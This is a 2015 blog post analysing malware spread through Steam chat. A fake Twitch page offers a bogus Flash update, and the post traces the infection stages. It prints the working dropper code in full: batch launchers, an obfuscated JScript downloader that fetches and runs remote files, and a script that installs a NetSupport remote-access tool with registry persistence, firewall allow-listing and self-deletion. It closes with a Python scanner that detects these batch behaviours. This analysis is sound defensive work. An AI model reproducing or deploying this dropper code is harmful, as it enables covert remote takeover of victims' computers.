Malware spreads via Steam Chat - including malware analysis


Posted: 2015-12-01 by Admin
Steam is a multi-player platform developed by Valve Corporation. It is used to distribute games and related media online. Steam provides the user with installation and automatic management of software across multiple computers, community features such as friends lists and groups, and in-game voice and chat functionality. The malware arrives via Steam's built-in chat client; here is an example of how it works. Steam Chat:
bakonoda: hey
bakonoda: just saw your video
bakonoda: nice Ace btw
bakonoda: http://twitch.lv/xxxxxxxx/v/XXXXXXXX
The link leads to a copy of the Twitch page. The page shows a fake message saying that your Flash Player is outdated and provides a link to the "update":
https://copy.com/XXXXXXXXXX?download=1
Name of the downloaded file:
install_flashplayer_29x83_pssd_win.exe
MD5: 2cccc536122a1d91e8bd3c5fa920364a
SHA1: 0aaa59a7637b8f22e6d669324c2f8d0c31140b63
SHA256: 195c7ec50f94211d1b4f36e5bf128ac6c15d1fc256302d7f86687cce811a5050
install_flashplayer_29x83_pssd_win.exe drops 3 files:
flashupd.bat
fl.dat
flash.exe
After the 3 files are dropped, install_flashplayer_29x83_pssd_win.exe executes flashupd.bat, a simple batch file. flashupd.bat:
@echo off
flash.exe e -pv1tal -y fl.dat
start twflash.exe
ping 127.0.0.1 -n 1
start wscript.exe //B //Nologo //T:360 "twflash.js"
ping 127.0.0.1 -n 2
flash.exe is a portable command-line archive extractor (UNRAR 4.10), which is used to extract the password-protected fl.dat archive (password: v1tal):
flash.exe e -pv1tal -y fl.dat
2 files are extracted:
twflash.exe
twflash.js
twflash.exe is UNRAR again and seems not to be used. twflash.js is a script for the Windows Script Host with the following content:
x=false?null:"responseBody";
xx=true?"Shell.Application":null;
xxx=ActiveXObject;
xxxx=false?null:"Scripting.FileSystemObject";
xxxxx=true?"WScript.Shell":null;
xxxxxx=false?null:"ExpandEnvironmentStrings";
xxxxxxx=true?"CreateObject":null;
xxxxxxxx=false?null:"Msxml2.XMLhttp";
xxxxxxxxx=true?"open":null;
(function(c){
  function a(a,b){
    if(!b||!a)return null;
    b=e[xxxxxx](b);
    var d=WScript[xxxxxxx](xxxxxxxx);
    d[xxxxxxxxx]("GET",a,!1);
    d.send(null);
    var c=new xxx("ADODB.Stream");
    with(c)return Mode=3,Type=1,Open(),Write(d[x]),SaveToFile(b,2),Close(),b
  }
  fso=new xxx(xxxx);
  var e=new xxx(xxxxx);
  c=new xxx(xx);
  FileDestr=e[xxxxxx]("%APPDATA%\\");
  a("https://copy.com/XXX1","%APPDATA%\\9za.exe");
  a("https://copy.com/XXX2","%APPDATA%\\sysfile");
  a("https://copy.com/XXX3","%APPDATA%\\systfile.cmd");
  c.ShellExecute("cmd.exe",'/c"'+FileDestr+'systfile.cmd"',"","runas",0)
})(this);
This script is executed by this line of the batch script:
start wscript.exe //B //Nologo //T:360 "twflash.js"
3 files are downloaded by the script:
9za.exe
sysfile
systfile.cmd
9za.exe, you guessed it: UNRAR again! sysfile is another archive, 7-Zip this time. systfile.cmd is a batch script again. systfile.cmd:
set a=cd
set b=attrib
set c=taskkill
%a% "%APPDATA%"
%b% +h "%APPDATA%\systfile.cmd"
if exist "%APPDATA%\rtv.bin" goto end
"%APPDATA%\9za.exe" x -pv1nj3ct02 -y "%APPDATA%\sysfile" -o"%APPDATA%"
%b% +h +s +r "%APPDATA%\sysfiles\*.*"
%b% +h +s +r "%APPDATA%\sysfiles"
del /f /q "%APPDATA%\sysfile"
%a% "%APPDATA%"
%a% sysfiles
netsh firewall add allowedprogram "%APPDATA%\sysfiles\client32.exe" AppleWebKit ENABLE
if exist client32.exe start client32.exe
taskkill /f /im rundll32.exe
ping 127.0.0.1 -n 1
%c% /f /im rundll32.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe"
taskkill /f /im client32.exe
ping 127.0.0.1 -n 2
if exist client32.exe start client32.exe
taskkill /f /im rundll32.exe
echo 1>"%APPDATA%\rtv.bin"
%b% +s +h "%APPDATA%\rtv.bin"
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe"
:end
%b% -h "%APPDATA%\systfile.cmd"
if not exist "%APPDATA%\java.exe" (del /f /q "%APPDATA%\9za.exe")
del /f /q "%APPDATA%\sysfile"
del /f /q "%APPDATA%\java.exe"
del /f /q "%APPDATA%\*.js"
del /f /q "%APPDATA%\input"
%b% -h "%APPDATA%\systfile.cmd"
del /f /q "%APPDATA%\systfile.cmd"
del %0
What does the script do? First it checks whether a file called rtv.bin exists. rtv.bin is a dummy file that makes sure the script is executed only once; it is created at the end of the script after its first execution:
echo 1>"%APPDATA%\rtv.bin"
After that check the script extracts the sysfile archive using 9za.exe. The archive is password-protected again (password: v1nj3ct02):
"%APPDATA%\9za.exe" x -pv1nj3ct02 -y "%APPDATA%\sysfile" -o"%APPDATA%"
A bunch of files are extracted, including client32.exe. client32.exe is added to the Windows autorun by this line of the script
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe"
and added to the whitelist of the Windows Firewall:
netsh firewall add allowedprogram "%APPDATA%\sysfiles\client32.exe" AppleWebKit ENABLE
After that the script deletes itself and all traces. Before it ends, it starts client32.exe. client32.exe is identified as NetSupport Manager, a remote control software that allows remote screen control and systems management. It has a bunch of features; once it is running, the system is fully under the attacker's control.
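As an added example (not code from the original post), a small Python scanner for batch droppers like systfile.cmd: it undoes the `set a=cd` / `%a%` aliasing that hides command names from a naive grep and then flags the persistence and evasion lines walked through above (Run key, firewall allow-listing, hidden files, process killing, run-once marker, self-deletion). The embedded sample is a constructed, cut-down copy of the script's relevant lines.

```python
import re

# Constructed sample: a cut-down version of the systfile.cmd dropper above,
# keeping its command-aliasing trick and the lines that matter to a defender.
SAMPLE_BATCH = r"""set a=cd
set b=attrib
set c=taskkill
%a% "%APPDATA%"
%b% +h "%APPDATA%\systfile.cmd"
if exist "%APPDATA%\rtv.bin" goto end
netsh firewall add allowedprogram "%APPDATA%\sysfiles\client32.exe" AppleWebKit ENABLE
%c% /f /im rundll32.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe"
:end
del %0
"""

# Behaviours worth flagging, matched against lines AFTER alias resolution.
INDICATORS = {
    "registry_run_persistence": re.compile(r'^reg\s+add\s+"?HK(?:EY_CURRENT_USER|CU)\\.*\\CurrentVersion\\Run\b', re.I),
    "firewall_allowlist": re.compile(r"^netsh\s+(?:adv)?firewall\s+.*\b(?:allowedprogram|add\s+rule)\b", re.I),
    "hide_files": re.compile(r"^attrib\s+.*\+h\b", re.I),
    "kill_process": re.compile(r"^taskkill\s+/f\b", re.I),
    "run_once_marker": re.compile(r"^if\s+exist\s+.*\s+goto\s+\w+", re.I),
    "self_delete": re.compile(r"^del\s+(?:/\S+\s+)*%0\b", re.I),
}

def resolve_aliases(lines):
    """Undo `set x=cmd` / `%x%` indirection so `%b% +h` reads as `attrib +h`.
    Variables that were never set in the script (e.g. %APPDATA%) are left as-is."""
    aliases, out = {}, []
    for line in lines:
        m = re.match(r"^\s*set\s+(\w+)=(\S+)\s*$", line, re.I)
        if m:
            aliases[m.group(1).lower()] = m.group(2)
            continue
        resolved = re.sub(r"%(\w+)%", lambda mm: aliases.get(mm.group(1).lower(), mm.group(0)), line)
        out.append(resolved.strip())
    return out

def scan_batch(text):
    """Map each indicator name to the resolved lines that triggered it."""
    hits = {}
    for line in resolve_aliases(text.splitlines()):
        for name, pat in INDICATORS.items():
            if pat.search(line):
                hits.setdefault(name, []).append(line)
    return hits
```

Running `scan_batch(SAMPLE_BATCH)` reports all six behaviours; a script that combines Run-key persistence with firewall allow-listing and self-deletion is a strong candidate for quarantine and for pivoting to the registry value and firewall rule it names.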